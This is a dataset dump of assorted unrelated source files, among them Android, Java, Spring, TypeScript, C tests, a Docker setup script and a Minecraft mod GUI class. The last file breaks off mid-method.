text stringlengths 1 1.05M |
|---|
package com.smallcake.utils;
import android.content.Context;
import java.util.Timer;
import java.util.TimerTask;
/**
 * Toast helper that accepts three message types:
 * String, int (a string resource id) and CharSequence.
 * (Renamed from T to ToastUtil to avoid clashing with the generic type T.)
 */
public class ToastUtil {

    private ToastUtil() {
        // Utility class; must not be instantiated.
        throw new UnsupportedOperationException("cannot be instantiated");
    }

    /** Shows a long-duration toast. {@code message} must be String|int|CharSequence. */
    public static void showLong(Object message) {
        show(SmallUtils.getApp(), message, android.widget.Toast.LENGTH_LONG);
    }

    /** Shows a short-duration toast. {@code message} must be String|int|CharSequence. */
    public static void showShort(Object message) {
        show(SmallUtils.getApp(), message, android.widget.Toast.LENGTH_SHORT);
    }

    /** Shows a long-duration toast at the given {@link android.view.Gravity} value. */
    public static void showGravityLong(Object message, int gravity) {
        showGravity(SmallUtils.getApp(), message, gravity, android.widget.Toast.LENGTH_LONG);
    }

    /** Shows a short-duration toast at the given {@link android.view.Gravity} value. */
    public static void showGravityShort(Object message, int gravity) {
        showGravity(SmallUtils.getApp(), message, gravity, android.widget.Toast.LENGTH_SHORT);
    }

    /**
     * Keeps a toast visible for approximately {@code cnt} milliseconds by
     * re-showing it every 3500 ms (the LENGTH_LONG duration) and then
     * cancelling it.
     *
     * @param message text to display
     * @param cnt     total display time in milliseconds
     */
    public static void showMyToast(String message, final int cnt) {
        final android.widget.Toast toast =
                android.widget.Toast.makeText(SmallUtils.getApp(), message, android.widget.Toast.LENGTH_LONG);
        final Timer showTimer = new Timer();
        showTimer.schedule(new TimerTask() {
            @Override
            public void run() {
                toast.show();
            }
        }, 0, 3500);
        // Cancel both timers when done; the previous version never cancelled the
        // second Timer, leaking its (non-daemon) background thread.
        final Timer cancelTimer = new Timer();
        cancelTimer.schedule(new TimerTask() {
            @Override
            public void run() {
                toast.cancel();
                showTimer.cancel();
                cancelTimer.cancel();
            }
        }, cnt);
    }

    /** Dispatches on the runtime type of {@code message}; unsupported types are logged. */
    private static void show(Context context, Object message, int duration) {
        // Use the supplied context consistently instead of re-fetching the app context.
        if (message instanceof String) {
            android.widget.Toast.makeText(context, (String) message, duration).show();
        } else if (message instanceof Integer) {
            android.widget.Toast.makeText(context, (int) message, duration).show();
        } else if (message instanceof CharSequence) {
            android.widget.Toast.makeText(context, (CharSequence) message, duration).show();
        } else {
            printErr(message);
        }
    }

    /** Like {@link #show} but positions the toast with the given gravity. */
    private static void showGravity(Context context, Object message, int gravity, int duration) {
        android.widget.Toast toast = null;
        if (message instanceof String) {
            toast = android.widget.Toast.makeText(context, (String) message, duration);
        } else if (message instanceof Integer) {
            toast = android.widget.Toast.makeText(context, (int) message, duration);
        } else if (message instanceof CharSequence) {
            toast = android.widget.Toast.makeText(context, (CharSequence) message, duration);
        } else {
            printErr(message);
            return;
        }
        // Vertical offset of 64dp, converted to pixels for the current density.
        toast.setGravity(gravity, 0, (int) (64 * context.getResources().getDisplayMetrics().density + 0.5));
        toast.show();
    }

    /** Logs an unsupported-message-type error without crashing the caller. */
    private static void printErr(Object message) {
        // Simplified from the previous throw-then-immediately-catch idiom;
        // the printed stack trace is equivalent.
        new UnsupportedOperationException(message + " must be String|int|CharSequence").printStackTrace();
    }
}
|
package com.lilarcor.popularmovies.framework.foundation.network.contracts;
import android.support.annotation.NonNull;
/**
* Created by <NAME> on 12/07/15.
*
* This contract provides methods to do basic network request
* operations, and offers response caching configured on a per
* request basis.
*
*/
public interface NetworkRequestProvider {
/**
 * Request callback delegate to return successful or failed
 * network request attempts. Is used for each request attempt.
 *
 * IMPORTANT NOTE: Any callback delegate methods are NOT executed
 * on the main thread. It is the caller's responsibility to make
 * any code after the callback invocation run on the main thread if
 * required.
 *
 * This design decision was deliberate - because it will allow the
 * receiver of the callback to continue to run in the worker thread
 * to complete any parsing of the response data etc, and therefore
 * get some async benefit for free.
 */
interface RequestDelegate {
/**
 * If the request reports to have completed successfully, this method
 * will be called with the resulting status code and raw string response.
 *
 * @param statusCode HTTP status code of the network operation.
 * @param response the raw string response text received.
 */
void onRequestComplete(int statusCode, @NonNull String response);
/**
 * If the request reports to have failed, this method will be called.
 * No status code or response body is supplied in the failure case.
 */
void onRequestFailed();
}
/**
 * Begin a new GET request with the given tag, url and callback
 * delegate.
 *
 * @param requestTag a unique tag for the request, to allow it to be identified for operations such as cancelling.
 * @param url the full http url to request.
 * @param maxCacheAgeInHours the value of this argument will determine how old the given request can be without attempting to connect
 * to the server. If the request has been cached previously and is younger than the max age, then it will
 * be returned instead of the full network request. For requests that should always go to the server, this
 * argument can be specified as 0 which will cause the next request to immediately be too old.
 * @param callbackDelegate the request callback delegate for when the request completes.
 */
void startGetRequest(@NonNull String requestTag, @NonNull String url, int maxCacheAgeInHours, @NonNull RequestDelegate callbackDelegate);
/**
 * Clear any cached responses so requests will resolve to the server again.
 *
 * @return true if the cache was successfully cleared.
 */
boolean clearResponseCache();
}
|
<filename>src/errors/CXImplicationError.java
package errors;
import tree.TreeNode;
/**
 * {@link CXError} subtype reported against a specific parse-tree node —
 * presumably raised when an implication check fails (named for it); all
 * behavior is inherited from {@link CXError}.
 */
public class CXImplicationError extends CXError {

    private static final long serialVersionUID = 4960599050470044576L;

    /**
     * @param string description of the error
     * @param node   the tree node the error refers to
     */
    public CXImplicationError(String string, TreeNode node) {
        // Removed the leftover auto-generated "TODO" stub comment.
        super(string, node);
    }
}
|
/*
*
*/
package net.community.chest.javaagent.dumper.ui.tree;
import net.community.chest.javaagent.dumper.ui.data.SelectiblePackageInfo;
/**
* <P>Copyright as per GPLv2</P>
* @author <NAME>.
* @since Aug 14, 2011 1:13:56 PM
*/
public class PackageNode extends AbstractInfoNode<SelectiblePackageInfo> {
    private static final long serialVersionUID = -7512566366222245598L;

    /** Creates a node for the given package, with children enabled by default. */
    public PackageNode(SelectiblePackageInfo packageInfo) {
        this(packageInfo, true);
    }

    /**
     * Creates a node labeled with the package's name.
     *
     * @param packageInfo  the package descriptor backing this node
     * @param withChildren whether child nodes should be populated
     */
    public PackageNode(SelectiblePackageInfo packageInfo, boolean withChildren) {
        super(SelectiblePackageInfo.class, packageInfo, packageInfo.getName(), withChildren);
    }
}
|
import { Module } from '@nestjs/common';
import { AppController } from './app.controller';
import { AppService } from './app.service';
import { UserModule } from './modules/user/user.module';
import { OrmModule } from './modules/orm/orm.module';
import { UserProfileModule } from './modules/user-profile/user-profile.module';
// TesteModule was imported three times (twice from a non-existent './src/...'
// path) — duplicate identifiers are a TypeScript compile error, so only the
// correct import is kept.
import { TesteModule } from './modules/teste/teste.module';

/** Root application module wiring controllers, providers and feature modules. */
@Module({
  imports: [OrmModule, UserModule, UserProfileModule, TesteModule],
  controllers: [AppController],
  providers: [AppService],
})
export class AppModule {}
|
<filename>core/c/tests/font_tests.c<gh_stars>1-10
#include <flowi_core/font.h>
#include "../src/atlas.h"
#include "../src/font_private.h"
#include "../src/internal.h"
#include "utest.h"
struct FlContext;
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Loading a non-existent font file must fail: fl_font_new_from_file is
// expected to return font id 0.
UTEST(Font, load_failed) {
struct FlGlobalState* state = fl_create(NULL);
struct FlContext* ctx = fl_context_create(state);
FlFont font_id = fl_font_new_from_file(ctx, "unable_to_load.bin", 12, FlFontPlacementMode_Auto);
// Expect loading fail
ASSERT_TRUE(font_id == 0);
// Tear down in reverse order of creation.
fl_context_destroy(ctx);
fl_destroy(state);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Loading a valid TTF from the test data directory must yield a non-zero id.
UTEST(Font, load_font_ok) {
struct FlGlobalState* state = fl_create(NULL);
struct FlContext* ctx = fl_context_create(state);
FlFont font_id = fl_font_new_from_file(ctx, "data/montserrat-regular.ttf", 36, FlFontPlacementMode_Auto);
// Expect loading to work
ASSERT_NE(0, font_id);
// fl_font_destroy(font_id);
fl_context_destroy(ctx);
fl_destroy(state);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Measures a short codepoint run; the expected 66x25 pixel box is specific to
// montserrat-regular at size 36.
UTEST(Font, calc_text_size) {
struct FlGlobalState* state = fl_create(NULL);
struct FlContext* ctx = fl_context_create(state);
FlFont font_id = fl_font_new_from_file(ctx, "data/montserrat-regular.ttf", 36, FlFontPlacementMode_Auto);
u32 codepoints[] = {'A', 'B', 'c', ' '};
// Select the loaded font directly on the context before measuring.
ctx->current_font = (Font*)Handles_get_data(&state->font_handles, font_id);
ctx->current_font_size = 36;
FlIVec2 size = Font_calc_text_size(ctx, codepoints, 4);
ASSERT_EQ(66, size.x);
ASSERT_EQ(25, size.y);
fl_context_destroy(ctx);
fl_destroy(state);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Generates glyphs for two codepoints and verifies that the expected
// CreateTexture (4096x4096 R8) and UpdateTexture render commands are emitted.
UTEST(Font, gen_glyph_verify_render_cmds) {
    struct FlGlobalState* state = fl_create(NULL);
    struct FlContext* ctx = fl_context_create(state);
    FlFont font_id = fl_font_new_from_file(ctx, "data/montserrat-regular.ttf", 36, FlFontPlacementMode_Auto);
    u32 test[] = {64, 65}; // '@' and 'A'
    int count = fl_render_begin_commands(state);
    const u8* cmd_data = NULL;
    bool found_create_texture = false;
    bool found_update_texture = false;

    // process all the render commands
    for (int i = 0; i < count; ++i) {
        switch (fl_render_get_command(state, &cmd_data)) {
            case FlRenderCommand_CreateTexture: {
                const FlCreateTexture* cmd = (FlCreateTexture*)cmd_data;
                // Don't assert directly as we may have more textures being created
                // so we verify that we have one that matches what we want
                if (cmd->width == 4096 && cmd->height == 4096 && cmd->format == FlTextureFormat_R8Linear) {
                    found_create_texture = true;
                }
                break;
            }
            default:
                // Other commands are irrelevant here; the explicit default also
                // silences -Wswitch under the build's -Wall.
                break;
        }
    }

    ASSERT_TRUE(found_create_texture);

    // Begin frame and generate some glyphs and figure out the range to update
    fl_frame_begin(ctx, 640, 480, 1.0f / 60.f);
    Atlas_begin_add_rects(state->mono_fonts_atlas);
    Font_generate_glyphs(ctx, (Font*)Handles_get_data(&state->font_handles, font_id), test, 2, 36);
    Atlas_end_add_rects(state->mono_fonts_atlas, state);
    fl_frame_end(ctx);

    count = fl_render_begin_commands(state);

    // Expect a update texture command here
    for (int i = 0; i < count; ++i) {
        switch (fl_render_get_command(state, &cmd_data)) {
            case FlRenderCommand_UpdateTexture: {
                const FlUpdateTexture* cmd = (FlUpdateTexture*)cmd_data;
                ASSERT_NE(cmd->data, NULL);
                ASSERT_EQ(cmd->texture_id, state->mono_fonts_atlas->texture_id);
                found_update_texture = true;
                break;
            }
            default:
                break;
        }
    }

    // validate that we have created some textures
    ASSERT_TRUE(found_update_texture);

    fl_font_destroy(ctx, font_id);
    fl_context_destroy(ctx);
    fl_destroy(state);
}
|
#import <Foundation/Foundation.h>
/*
 * Reads an upper bound from stdin and logs every prime in [2, max] via NSLog.
 */
int main(int argc, const char * argv[]) {
    @autoreleasepool {
        int max;
        // Guard the read: on failure scanf leaves `max` uninitialized, which
        // previously caused undefined behavior in the loop bound.
        if (scanf("%d", &max) != 1) {
            return 1;
        }
        for (int i = 2; i <= max; i++) {
            bool prime = true;
            // Trial division: a composite i always has a divisor <= sqrt(i),
            // so stopping at j*j <= i is sufficient (and much faster).
            for (int j = 2; j * j <= i; j++) {
                if (i % j == 0) {
                    prime = false;
                    break;
                }
            }
            if (prime) {
                NSLog(@"%d", i);
            }
        }
    }
    return 0;
}
<gh_stars>0
import Cesium from "cesium";
import createCesiumComponent, { EventkeyMap } from "./core/CesiumComponent";
// Props that map onto mutable Cesium.CzmlDataSource properties.
export interface CzmlDataSourceCesiumProps {
clustering?: Cesium.EntityCluster;
}
// Props only honored when the Cesium instance is constructed.
export interface CzmlDataSourceCesiumReadonlyProps {
name?: string;
}
// Cesium event subscriptions exposed as React-style callback props
// (wired via cesiumEventProps below).
export interface CzmlDataSourceCesiumEvents {
onChange?: (CzmlDataSource: Cesium.CzmlDataSource) => void;
onError?: (CzmlDataSource: Cesium.CzmlDataSource, error: any) => void;
onLoading?: (CzmlDataSource: Cesium.CzmlDataSource, isLoaded: boolean) => void;
}
/**
 * All props accepted by the CzmlDataSource component: the Cesium-backed,
 * readonly and event props, plus the load configuration below.
 */
export interface CzmlDataSourceProps
  extends CzmlDataSourceCesiumProps,
    CzmlDataSourceCesiumReadonlyProps,
    CzmlDataSourceCesiumEvents {
  // CZML to load: a Cesium resource, a URL string, or a CZML object.
  data?: Cesium.Resource | string | object;
  sourceUri?: string;
  show?: boolean;
  // Fired once the CZML has finished loading (typo "CzmlDataSouce" fixed).
  onLoad?: (CzmlDataSource: Cesium.CzmlDataSource) => void;
}
// Context consumed from an ancestor component — presumably the Viewer/CesiumWidget
// wrapper that owns the DataSourceCollection; confirm against core/CesiumComponent.
export interface CzmlDataSourceContext {
dataSourceCollection?: Cesium.DataSourceCollection;
}
// Mutable props forwarded to the Cesium instance on update.
const cesiumProps: Array<keyof CzmlDataSourceCesiumProps> = ["clustering"];
// Constructor-only props.
const cesiumReadonlyProps: Array<keyof CzmlDataSourceCesiumReadonlyProps> = ["name"];
// Maps Cesium event names to the matching callback prop.
const cesiumEventProps: EventkeyMap<Cesium.CzmlDataSource, keyof CzmlDataSourceCesiumEvents> = {
changedEvent: "onChange",
errorEvent: "onError",
loadingEvent: "onLoading",
};
/**
 * Loads CZML data into the given data source and invokes onLoad when done.
 * (The dataSources field is accepted for call-site compatibility but unused.)
 */
const load = ({
  element,
  data,
  onLoad,
  sourceUri,
}: {
  element: Cesium.CzmlDataSource;
  dataSources: Cesium.DataSourceCollection;
  data: Cesium.Resource | string | object;
  onLoad?: (CzmlDataSource: Cesium.CzmlDataSource) => void;
  sourceUri?: string;
}) => {
  element
    .load(data, {
      sourceUri,
    })
    .then(value => {
      // The previous try { onLoad(value) } catch (e) { throw e } was a no-op
      // wrapper and has been removed; errors propagate exactly as before.
      if (onLoad) {
        onLoad(value);
      }
    });
};
/**
 * React wrapper around Cesium.CzmlDataSource: on mount the data source is
 * added to the surrounding DataSourceCollection and loaded (when `data` is
 * set); on updates `show` and data/sourceUri changes are synced; on unmount
 * it is removed from the collection again.
 */
const CzmlDataSource = createCesiumComponent<
Cesium.CzmlDataSource,
CzmlDataSourceProps,
CzmlDataSourceContext
>({
name: "CzmlDataSource",
// Creates the Cesium instance; `name` is constructor-only, clustering and
// show are applied when provided.
create(cprops, props) {
const ds = new Cesium.CzmlDataSource(props.name);
if (cprops.clustering) {
ds.clustering = cprops.clustering;
}
if (typeof cprops.show === "boolean") {
ds.show = cprops.show;
}
return ds;
},
// Adds the data source to the collection and kicks off the initial load.
mount(element, context, props) {
if (context.dataSourceCollection) {
context.dataSourceCollection.add(element);
if (props.data) {
load({
element,
dataSources: context.dataSourceCollection,
data: props.data,
onLoad: props.onLoad,
sourceUri: props.sourceUri,
});
}
}
},
// Syncs visibility (hidden whenever there is no data) and reloads when the
// data or sourceUri props changed.
update(element, props, prevProps, context) {
if (prevProps.show !== props.show || !props.data) {
element.show = !!props.data && (typeof props.show === "boolean" ? props.show : true);
}
if (
context.dataSourceCollection &&
props.data &&
(prevProps.data !== props.data || prevProps.sourceUri !== props.sourceUri)
) {
load({
element,
dataSources: context.dataSourceCollection,
data: props.data,
onLoad: props.onLoad,
sourceUri: props.sourceUri,
});
}
},
// Detaches from the collection unless the collection is already destroyed.
unmount(element, context) {
if (context.dataSourceCollection && !context.dataSourceCollection.isDestroyed()) {
context.dataSourceCollection.remove(element);
}
},
cesiumProps,
cesiumReadonlyProps,
cesiumEventProps,
});
export default CzmlDataSource;
|
import { withIcon } from "../withIcon";
import { ReactComponent as Icon } from "./chevron-left.svg";
// Chevron-left icon component built from the SVG via the shared withIcon wrapper.
export const IconChevronLeft = withIcon(Icon);
|
package com.home.demo.config;
import javax.sql.DataSource;
import org.flowable.engine.HistoryService;
import org.flowable.engine.IdentityService;
import org.flowable.engine.ManagementService;
import org.flowable.engine.ProcessEngine;
import org.flowable.engine.ProcessEngineConfiguration;
import org.flowable.engine.RepositoryService;
import org.flowable.engine.RuntimeService;
import org.flowable.engine.TaskService;
import org.flowable.engine.impl.cfg.StandaloneProcessEngineConfiguration;
import org.flowable.idm.engine.IdmEngineConfiguration;
import org.flowable.idm.engine.impl.cfg.StandaloneIdmEngineConfiguration;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.boot.bind.RelaxedPropertyResolver;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.Primary;
import org.springframework.core.env.Environment;
/**
 * Spring configuration that builds the Flowable process engine from the
 * application DataSource and exposes the engine plus its service facades
 * (repository, runtime, task, history, management, identity) as primary beans.
 */
@Configuration
public class ProcessEngineConfig {

    // Option 3: inject the Environment and read configuration from it directly.
    @Autowired
    private Environment environment;

    /**
     * Reference snippet for resolving "mysql.flowable.*" properties; never
     * invoked (no @PostConstruct). The previous version constructed a
     * RelaxedPropertyResolver and immediately discarded it — that dead
     * allocation is now commented out with the rest of the example.
     */
    public void init() {
        // RelaxedPropertyResolver propertyResolver =
        //         new RelaxedPropertyResolver(environment, "mysql.flowable.");
        // String url = propertyResolver.getProperty("url");
    }

    /** Standalone IDM engine configuration bound to the shared DataSource. */
    @Bean(name = "idmEngineConfiguration")
    @Primary
    public IdmEngineConfiguration idmEngineConfiguration(@Qualifier("dataSource") DataSource dataSource) {
        IdmEngineConfiguration idmEngineConfiguration = new StandaloneIdmEngineConfiguration();
        idmEngineConfiguration.setDataSource(dataSource);
        return idmEngineConfiguration;
    }

    /**
     * Standalone process engine configuration; DB_SCHEMA_UPDATE_TRUE lets
     * Flowable create or upgrade its tables on startup.
     */
    @Bean(name = "processEngineConfiguration")
    @Primary
    public ProcessEngineConfiguration processEngineConfiguration(@Qualifier("dataSource") DataSource dataSource) {
        return new StandaloneProcessEngineConfiguration()
                .setDataSource(dataSource)
                .setDatabaseSchemaUpdate(ProcessEngineConfiguration.DB_SCHEMA_UPDATE_TRUE);
        // .setAsyncExecutorActivate(Boolean.valueOf(environment.getProperty("asyncExecutorActivate")))
        // .setMailServerHost(environment.getProperty("mailServerHost"))
        // .setMailServerPort(Integer.valueOf(environment.getProperty("mailServerPort")));
    }

    /** Builds the singleton process engine from the configuration above. */
    @Bean(name = "processEngine")
    @Primary
    public ProcessEngine processEngine(
            @Qualifier("processEngineConfiguration") ProcessEngineConfiguration processEngineConfiguration) {
        // Redundant `throws Exception` removed from this and the accessors
        // below; none of the delegated calls throw checked exceptions.
        return processEngineConfiguration.buildProcessEngine();
    }

    /** Deployment / process-definition management service. */
    @Bean(name = "repositoryService")
    @Primary
    public RepositoryService repositoryService(@Qualifier("processEngine") ProcessEngine processEngine) {
        return processEngine.getRepositoryService();
    }

    /** Process instance / execution service. */
    @Bean(name = "runtimeService")
    @Primary
    public RuntimeService runtimeService(@Qualifier("processEngine") ProcessEngine processEngine) {
        return processEngine.getRuntimeService();
    }

    /** User task service. */
    @Bean(name = "taskService")
    @Primary
    public TaskService taskService(@Qualifier("processEngine") ProcessEngine processEngine) {
        return processEngine.getTaskService();
    }

    /** Historic data query service. */
    @Bean(name = "historyService")
    @Primary
    public HistoryService historyService(@Qualifier("processEngine") ProcessEngine processEngine) {
        return processEngine.getHistoryService();
    }

    /** Engine management / maintenance service. */
    @Bean(name = "managementService")
    @Primary
    public ManagementService managementService(@Qualifier("processEngine") ProcessEngine processEngine) {
        return processEngine.getManagementService();
    }

    /** User and group identity service. */
    @Bean(name = "identityService")
    @Primary
    public IdentityService identityService(@Qualifier("processEngine") ProcessEngine processEngine) {
        return processEngine.getIdentityService();
    }
}
|
$LOAD_PATH.unshift(File.dirname(__FILE__))
$LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))

# Demo: start a screen session named 'Beatles' containing four windows,
# one named after each band member.
require 'screen'

Screen('Beatles') do
  %w[John Paul George Ringo].each do |member|
    window(member)
  end
end
|
/*
* Copyright [2020-2030] [https://www.stylefeng.cn]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Guns采用APACHE LICENSE 2.0开源协议,您在使用过程中,需要注意以下几点:
*
* 1.请不要删除和修改根目录下的LICENSE文件。
* 2.请不要删除和修改Guns源码头部的版权声明。
* 3.请保留源码和相关描述文件的项目出处,作者声明等。
* 4.分发源码时候,请注明软件出处 https://gitee.com/stylefeng/guns
* 5.在修改包名,模块名称,项目代码等时,请注明软件出处 https://gitee.com/stylefeng/guns
* 6.若您的项目无法满足以上几点,可申请商业授权
*/
package cn.stylefeng.roses.kernel.db.api.pojo.druid;
import lombok.Data;
import lombok.extern.slf4j.Slf4j;
/**
 * <p>Database datasource configuration.</p>
 * <p>Note: do not change the defaults of these properties here; configure
 * them in "application.yml" instead.</p>
 *
 * @author stylefeng
 * @date 2017/5/21 11:18
 */
@Data
@Slf4j
public class DruidProperties {
/**
 * Datasource name; not an official Druid setting.
 */
private String dataSourceName;
/**
 * JDBC url for the database; differs per database vendor.
 * Examples:
 * mysql : jdbc:mysql://10.20.153.104:3306/druid2
 * oracle : jdbc:oracle:thin:@10.20.149.85:1521:ocnauto
 */
private String url;
/**
 * Database username.
 */
private String username;
/**
 * Database password. If you do not want the plain-text password in the
 * config file, use ConfigFilter.
 * Details: https://github.com/alibaba/druid/wiki/%E4%BD%BF%E7%94%A8ConfigFilter
 */
private String password;
/**
 * Optional: when omitted, Druid infers dbType from the url and picks the
 * matching driverClassName automatically.
 */
private String driverClassName;
/**
 * Number of physical connections created at initialization. Initialization
 * happens on an explicit init() call or on the first getConnection().
 */
private Integer initialSize = 2;
/**
 * Maximum pool size.
 */
private Integer maxActive = 20;
/**
 * Minimum pool size.
 */
private Integer minIdle = 1;
/**
 * Maximum wait time when acquiring a connection, in milliseconds.
 * Configuring maxWait enables a fair lock by default, which lowers
 * concurrency; set useUnfairLock=true if an unfair lock is needed.
 */
private Integer maxWait = 60000;
/**
 * Whether to cache preparedStatements (PSCache). PSCache is a large win on
 * databases with cursor support such as Oracle; recommended off for MySQL.
 */
private Boolean poolPreparedStatements = true;
/**
 * Must be configured > 0 to enable PSCache (-1 disables it).
 * When > 0, poolPreparedStatements is automatically switched to true.
 * Druid does not suffer Oracle's PSCache excessive-memory problem, so a
 * larger value such as 100 is fine.
 */
private Integer maxPoolPreparedStatementPerConnectionSize = 100;
/**
 * SQL used to check whether a connection is valid; must be a query,
 * commonly select 'x'. If validationQuery is null, testOnBorrow,
 * testOnReturn and testWhileIdle have no effect.
 */
private String validationQuery;
/**
 * Unit: seconds. Timeout for the validation check; applied via the JDBC
 * Statement method void setQueryTimeout(int seconds).
 */
private Integer validationQueryTimeout = 10;
/**
 * Run validationQuery when borrowing a connection; enabling this reduces
 * performance.
 */
private Boolean testOnBorrow = true;
/**
 * Run validationQuery when returning a connection; enabling this reduces
 * performance.
 */
private Boolean testOnReturn = true;
/**
 * Recommended true; does not affect performance and improves safety.
 * Validates on borrow when the idle time exceeds
 * timeBetweenEvictionRunsMillis.
 */
private Boolean testWhileIdle = true;
/**
 * For connections within the minIdle count whose idle time exceeds
 * minEvictableIdleTimeMillis, a keepAlive operation is performed.
 */
private Boolean keepAlive = false;
/**
 * Two meanings:
 * 1) Interval at which the Destroy thread checks connections; physical
 *    connections idle for >= minEvictableIdleTimeMillis are closed.
 * 2) Basis for the testWhileIdle decision — see that property.
 */
private Integer timeBetweenEvictionRunsMillis = 60000;
/**
 * Minimum time a connection may stay idle before it becomes evictable.
 */
private Integer minEvictableIdleTimeMillis = 300000;
/**
 * Comma-separated plugin aliases. Common filters:
 * stat  — monitoring statistics
 * log4j — logging
 * wall  — SQL-injection defense
 */
private String filters = "stat";
}
|
#!/bin/bash
# Spins up a disposable SQL Server container for dbdeploy testing, replacing
# any previous container of the same name.
set -e
set -x
#
# Copyright 2017 Goldman Sachs.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
INSTANCE_PORT=1433
INSTANCE_DBNAME="dbdeploy"
INSTANCE_USERID="sa" # note - this user ID is hardcoded by the container
INSTANCE_PASSWORD="Deploybuilddb0!"
CONTAINER_IMAGE="microsoft/mssql-server-linux:2017-latest"
CONTAINER_NAME=obevo-mssql-instance

# Remove a leftover container from a previous run, if any.
OLD_CONTAINER_ID=$(docker ps -aqf "name=$CONTAINER_NAME")
if [ -n "$OLD_CONTAINER_ID" ]
then
    echo "Shutting down old container"
    docker stop "$OLD_CONTAINER_ID"
    docker rm "$OLD_CONTAINER_ID"
fi

# NOTE(review): the previous version echoed the SA password in plain text;
# keep credentials out of build logs (set -x still traces the docker run
# line — consider wrapping it in `set +x` / `set -x` as well).
echo "Starting container $CONTAINER_NAME"
docker pull "$CONTAINER_IMAGE"
docker run -e "ACCEPT_EULA=Y" -e "SA_PASSWORD=$INSTANCE_PASSWORD" \
    -p "$INSTANCE_PORT:$INSTANCE_PORT" --name "$CONTAINER_NAME" \
    -d "$CONTAINER_IMAGE"
echo "Container created"
|
package com.professorvennie.bronzeage.client.gui;
import com.professorvennie.bronzeage.BronzeAge;
import com.professorvennie.bronzeage.api.enums.RedstoneMode;
import com.professorvennie.bronzeage.client.gui.buttons.GuiButtonRedStone;
import com.professorvennie.bronzeage.core.network.MessageButton;
import com.professorvennie.bronzeage.core.network.PacketHandler;
import com.professorvennie.bronzeage.lib.Reference;
import com.professorvennie.bronzeage.tileentitys.TileEntityBasicMachine;
import com.professorvennie.bronzeage.tileentitys.TileEntityBasicSidedInventory;
import net.minecraft.client.Minecraft;
import net.minecraft.client.gui.FontRenderer;
import net.minecraft.client.gui.GuiButton;
import net.minecraft.client.gui.inventory.GuiContainer;
import net.minecraft.client.renderer.Tessellator;
import net.minecraft.client.resources.I18n;
import net.minecraft.inventory.Container;
import net.minecraft.util.IIcon;
import net.minecraft.util.ResourceLocation;
import net.minecraft.util.StatCollector;
import net.minecraftforge.fluids.FluidStack;
import net.minecraftforge.fluids.FluidTank;
import org.lwjgl.input.Mouse;
import org.lwjgl.opengl.GL11;
import java.util.ArrayList;
import java.util.List;
/**
 * Created by ProfessorVennie on 10/23/2014 at 9:48 PM.
 *
 * Base container GUI shared by the mod's machine screens: draws the
 * background/foreground, hosts the redstone-mode button, and provides
 * helpers for tooltips, fluid tanks and tiled icon rendering.
 */
public class GuiBase extends GuiContainer {
// Background texture of the concrete screen; may remain null (nothing drawn then).
public ResourceLocation backGround;
// Shared GUI element sheet (button/overlay graphics).
public ResourceLocation elements = new ResourceLocation(Reference.MOD_ID, "textures/gui/guiElements.png");
// Machine backing this GUI; null for plain inventories.
public TileEntityBasicMachine basicSteamMachine;
// Mouse position relative to the GUI's top-left corner (see handleMouseInput).
protected int mouseX = 0, mouseY = 0;
protected List tabList = new ArrayList();
// NOTE(review): the tileEntity argument is discarded and null is forwarded —
// confirm whether sided inventories were meant to reach the machine field.
public GuiBase(Container container, TileEntityBasicSidedInventory tileEntity) {
this(container, null);
}
public GuiBase(Container container, TileEntityBasicMachine basicMachine) {
super(container);
this.basicSteamMachine = basicMachine;
}
@Override
public void initGui() {
super.initGui();
// Redstone-mode toggle button placed just to the right of the GUI.
buttonList.add(new GuiButtonRedStone(0, guiLeft + xSize + 1, guiTop + ySize - 160, basicSteamMachine));
}
@Override
protected void drawGuiContainerBackgroundLayer(float p_146976_1_, int p_146976_2_, int p_146976_3_) {
GL11.glColor4f(0F, 0.30F, 0.97F, 1F);
Minecraft.getMinecraft().getTextureManager().bindTexture(elements);
if (basicSteamMachine != null) {
// Red-tinted 28x28 tab drawn beside the GUI for machine screens.
GL11.glColor4f(0.97F, 0.00F, 0F, 1F);
drawTexturedModalRect(guiLeft + 176, guiTop + 3, 0, 93, 28, 28);
//drawTexturedModalRect(guiLeft + 176, guiTop + 31, 0, 93, 28, 28);
}
// Reset the tint before drawing the main background texture.
GL11.glColor4f(1F, 1F, 1F, 1F);
if (backGround != null) {
Minecraft.getMinecraft().getTextureManager().bindTexture(backGround);
drawTexturedModalRect(guiLeft, guiTop, 0, 0, xSize, ySize);
}
}
@Override
protected void drawGuiContainerForegroundLayer(int p_146979_1_, int p_146979_2_) {
// Player inventory label, then the localized machine name centered at the top.
this.fontRendererObj.drawString(I18n.format("container.inventory", BronzeAge.INSTANSE), 8, this.ySize - 96 + 2, 4210752);
String name = "";
if (basicSteamMachine != null)
name = StatCollector.translateToLocal("container." + basicSteamMachine.getInventoryName());
this.fontRendererObj.drawString(name, this.xSize / 2 - this.fontRendererObj.getStringWidth(name) / 2, 6, 4210752);
}
@Override
protected void actionPerformed(GuiButton button) {
switch (button.id) {
case 0:
// Redstone button: cycle low -> high -> disabled -> low, update the button
// and tile entity locally, and notify the server (message ids 0/1/2).
if (button instanceof GuiButtonRedStone) {
if (basicSteamMachine != null) {
GuiButtonRedStone buttonRedStone = (GuiButtonRedStone) button;
switch (basicSteamMachine.getRedStoneMode()) {
case low:
buttonRedStone.setMode(RedstoneMode.high);
basicSteamMachine.setRedstoneMode(RedstoneMode.high);
